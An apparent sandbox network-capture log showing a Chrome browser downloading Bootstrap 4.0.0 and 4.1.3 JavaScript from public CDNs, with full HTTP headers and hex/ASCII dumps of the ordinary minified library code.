                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                          Data Ascii: rn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d
                                                                                                                                          Data Ascii: rn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.449752104.18.11.2074432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:15 UTC601OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                                                                          Host: maxcdn.bootstrapcdn.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:15 UTC966INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:15 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          CDN-PullZone: 252412
                                                                                                                                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                          CDN-RequestCountryCode: US
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=31919000
                                                                                                                                          ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                                                                          Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                          CDN-ProxyVer: 1.06
                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                          CDN-RequestPullCode: 200
                                                                                                                                          CDN-CachedAt: 11/06/2024 23:22:44
                                                                                                                                          CDN-EdgeStorageId: 1067
                                                                                                                                          timing-allow-origin: *
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CDN-Status: 200
                                                                                                                                          CDN-RequestTime: 0
                                                                                                                                          CDN-RequestId: e774d8d52509c799f16bcfb0fb1eea8d
                                                                                                                                          CDN-Cache: HIT
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 165442
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e99b1691e598c84-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-28 10:32:15 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                          Data Ascii: 7bed/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                                                                                          Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c
                                                                                                                                          Data Ascii: function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isEl
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73
                                                                                                                                          Data Ascii: e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._des
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74
                                                                                                                                          Data Ascii: &p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d
                                                                                                                                          Data Ascii: mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64
                                                                                                                                          Data Ascii: l),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d
                                                                                                                                          Data Ascii: (!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)}
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d
                                                                                                                                          Data Ascii: t(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).rem
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73
                                                                                                                                          Data Ascii: DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collaps


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449753104.18.10.2074432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:15 UTC567OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                                                                          Host: stackpath.bootstrapcdn.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:15 UTC966INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:15 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          CDN-PullZone: 252412
                                                                                                                                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                          CDN-RequestCountryCode: US
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=31919000
                                                                                                                                          ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                                                                          Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                                          CDN-ProxyVer: 1.04
                                                                                                                                          CDN-RequestPullSuccess: True
                                                                                                                                          CDN-RequestPullCode: 200
                                                                                                                                          CDN-CachedAt: 10/04/2024 02:53:43
                                                                                                                                          CDN-EdgeStorageId: 1029
                                                                                                                                          timing-allow-origin: *
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CDN-Status: 200
                                                                                                                                          CDN-RequestTime: 1
                                                                                                                                          CDN-RequestId: c6c8a086d090f1d2baac8a7b0c894894
                                                                                                                                          CDN-Cache: HIT
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 173540
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e99b1695de3422b-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-28 10:32:15 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                          Data Ascii: 7bed/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                          Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44
                                                                                                                                          Data Ascii: ,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID
